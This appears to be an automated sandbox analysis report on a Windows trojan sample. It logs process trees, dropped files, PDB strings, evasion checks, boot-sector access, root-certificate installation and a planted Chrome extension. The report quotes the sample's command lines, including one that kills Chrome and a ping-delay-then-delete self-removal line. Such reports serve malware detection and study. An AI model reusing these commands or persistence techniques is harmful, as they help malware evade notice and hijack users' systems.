Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Roaming\1618257864703.exe 'C:\Users\user\AppData\Roaming\1618257864703.exe' /sjson 'C:\Users\user\AppData\Roaming\1618257864703.txt'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Roaming\1618257864703.exe 'C:\Users\user\AppData\Roaming\1618257864703.exe' /sjson 'C:\Users\user\AppData\Roaming\1618257864703.txt'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32

Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Static file information: File size 4255416 > 1048576

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1618257864703.exe, 0000000B.00000000.375331219.000000000040F000.00000002.00020000.sdmp, 1618257864703.exe.6.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.6.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.6.dr
Source:	Binary string: atl71.pdb source: atl71.dll.6.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.6.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.6.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.6.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.6.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.6.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000015.00000000.408882795.000000000001C000.00000002.00020000.sdmp, ThunderFW.exe.6.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.6.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.6.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI429C.tmp.3.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe.2690000.4.unpack

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00403E2C push edx; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00404042 push edx; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_004040D9 push edx; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_004038A0 push eax; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00403FA9 push edx; ret
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100105D9 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100105D9 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Code function: 11_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_00013FB5 push ecx; ret

Persistence and Installation Behavior:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d

Installs new ROOT certificates

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\download_user.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Roaming\1618257864703.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	File created: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI429C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\icon.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\icon48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\popup.html	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\background.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\book.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\jquery-1.8.3.min.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\popup.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\manifest.json	Jump to behavior

Boot Survival:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Code function: 11_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1618257864703.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10020600
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10020600

Uses ping.exe to sleep

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_user.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10020600
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10020600

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe TID: 6504	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe TID: 6760	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe TID: 6892	Thread sleep time: -270000s >= -30000s

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1001A1D0 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1001A1D0 FindFirstFileA,FindClose,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\

Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422617466.0000000003E82000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.389162844.0000000003E81000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426166948.0000000002B1C000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}s
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.366953663.0000000002A01000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.374949364.0000000002C41000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus 